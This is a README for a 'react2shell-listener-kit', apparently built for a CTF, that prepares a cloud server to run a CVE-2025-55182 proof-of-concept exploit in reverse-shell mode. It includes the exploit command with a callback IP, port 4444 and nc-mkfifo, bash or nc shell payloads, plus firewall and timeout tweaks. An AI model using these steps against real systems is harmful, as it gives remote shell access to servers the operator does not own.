Slothdemon22/ctf-nust

# react2shell-listener-kit

Plug-and-play setup to run the CVE-2025-55182 (React2Shell) PoC reverse-shell mode from a machine with a real public IPv4 (e.g. a DigitalOcean droplet). Includes a NAT-safe bind patch (listen on `0.0.0.0`, callback IP taken from `-l`).

Use only on systems you own or are explicitly authorized to test.

## Requirements (DigitalOcean)

- Droplet: Ubuntu 22.04 or 24.04 (or any Linux with Python 3.10+).
- Public IPv4 on the droplet (no extra NAT in front of the droplet).
- Inbound TCP allowed on the port you choose (e.g. 4444):
  - Droplet firewall / DO Cloud Firewall: allow TCP 4444 from `0.0.0.0/0` (or restrict to the CTF egress address if you know it).
  - OS: `ufw allow 4444/tcp` if you use UFW (SSH stays on 22).

## One-time droplet bootstrap

SSH in as root or a sudo user, then:

```bash
sudo apt-get update
sudo apt-get install -y git python3 python3-venv python3-pip
```

Clone this kit (after you push it to GitHub), or copy the folder to the droplet:

```bash
git clone https://github.com/YOUR_USER/react2shell-listener-kit.git
cd react2shell-listener-kit
chmod +x install.sh
./install.sh
```

## Every session

```bash
cd react2shell-listener-kit
source .venv/bin/activate
PUBLIC_IP=$(curl -sS --max-time 5 ifconfig.me || curl -sS --max-time 5 icanhazip.com)
echo "Using callback IP: $PUBLIC_IP"
```

Run the reverse-shell mode against the authorized target:

```bash
python3 CVE-2025-55182/exploit.py -u 'http://TARGET_HOST:PORT' \
  -r -l "$PUBLIC_IP" -p 4444 -P nc-mkfifo --timeout 60
```

Try `-P bash` or `-P nc` if `nc-mkfifo` fails on the remote app container.

## Longer wait for callback

If the script times out waiting for a connection, edit `CVE-2025-55182/exploit.py` and increase `server.settimeout(10)` in `_create_listener` (e.g. to 120).

## Python packages only (local venv)

From this repo root:

```bash
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
```

Then run `./install.sh` once so `CVE-2025-55182/` exists and is patched.

## Why not bind the droplet's public IP in Python?

On laptops behind home routers, the public IP is not configured on any local NIC, so `bind(public_ip)` fails. On a droplet the same pattern is still fragile (a floating IP or metadata-assigned address may not be configured on the NIC either). Binding `0.0.0.0` accepts connections destined to any local address that reaches the listener; `curl ifconfig.me` gives the IP the victim should dial.

## Create your GitHub repo

On your machine:

```bash
cd react2shell-listener-kit
git init
git add README.md requirements.txt install.sh .gitignore
git commit -m "Add DO-friendly React2Shell reverse listener kit"
```

Create an empty repo on GitHub (no README), then:

```bash
git remote add origin https://github.com/YOUR_USER/react2shell-listener-kit.git
git branch -M main
git push -u origin main
```

## References